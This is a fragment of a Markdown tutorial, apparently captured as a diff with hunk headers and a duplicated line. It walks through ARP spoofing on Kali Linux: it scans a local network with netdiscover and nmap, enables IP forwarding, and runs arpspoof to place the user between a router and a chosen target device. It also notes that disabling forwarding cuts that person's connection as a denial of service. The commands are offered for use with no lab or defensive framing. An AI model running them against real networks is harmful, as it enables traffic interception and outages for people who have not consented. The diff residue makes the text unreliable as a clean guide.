This tutorial assumes you are using kali, where these programs are already installed.
## Step 1
Run nmap or netdiscover to list the devices on the network.
-`netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network.
`netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network.
```
nmap -vvv 192.168.1.0/24
```
@@ -16,6 +17,7 @@ nmap -vvv 192.168.1.0/24
```
echo 1 > /proc/sys/net/ipv4/ip_forward
```
this command is fundamental. Without changing it to `1`you will only block the traffic, but not forward it. So that will bring down the connection for that person. Denial of service. If you want to do that make sure it is set to 0. If you want to intercept it make sure it is set to 1.
## Step 3
@@ -23,6 +25,7 @@ this command is fundamental. Without changing it to `1`you will only block the t
```
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105
```
-`-i` is the interface flag. In this example we choose the wlan0 interface. Run `ifconfig` to see which interfaces you have available.
-`-t` the target flag. It specifies your target. The first address is the router, and the second is the specific device you want to target.